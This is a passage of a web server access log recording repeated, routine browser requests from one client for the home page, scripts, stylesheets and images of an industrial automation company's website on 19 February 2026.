222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:00:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:28:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:02:28:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:28:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:28:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:34:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10002] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:02:34:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:34:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:34:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:34:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:34:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:34:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:34:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20864] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:34:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:34:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:34:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:34:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:34:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:39:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10030] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:02:39:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:39:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:39:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:39:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:39:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:39:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:39:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20864] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:39:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:39:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:39:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:39:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:39:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:41:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10020] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:02:41:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:41:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:41:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:41:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:41:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:41:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:41:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20864] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:41:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:41:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:41:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:41:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:41:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:44:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10016] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:02:44:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:44:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:44:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:44:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:44:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:44:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:44:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20864] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:44:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:44:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:44:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:44:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:44:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:46:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10029] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:02:46:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:46:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:46:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:46:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:46:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:46:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:46:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20864] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:46:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:46:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:46:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:46:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:46:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:47:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10014] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:02:47:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:47:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:47:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:02:47:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 